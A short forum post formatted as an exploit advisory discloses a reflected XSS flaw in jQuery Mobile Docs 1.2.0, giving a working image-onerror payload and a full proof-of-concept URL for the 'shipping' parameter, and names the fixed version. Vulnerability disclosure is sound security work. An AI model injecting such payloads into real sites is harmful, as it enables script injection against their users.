dr.d3v1l Posted September 5, 2015 Report Posted September 5, 2015 # Exploit Title: jQuery Mobile Docs 1.2.0 final XSS Reflected # Software Link: jQuery Mobile: Demos and Documentation# Exploit Author: Dr.d3v1l# Tested On : Windows FireFox# CVE : N/A# Category: webapps# Date: 05/09/20151. Description Reflective XSS on forms-sample-response.php?shipping=2. POC URL:404 Not Founde.g.code: "><img src="http://url.to.file.which/not.exist" onerror=alert(1);>URL+CODE= http://localhost/fileadmin/mobile_site/templates/docs/forms/forms-sample-response.php?shipping="><img src="http://url.to.file.which/not.exist" onerror=alert(1);>3. Solution:Update to version 1.3.1jQuery Mobile Demos Quote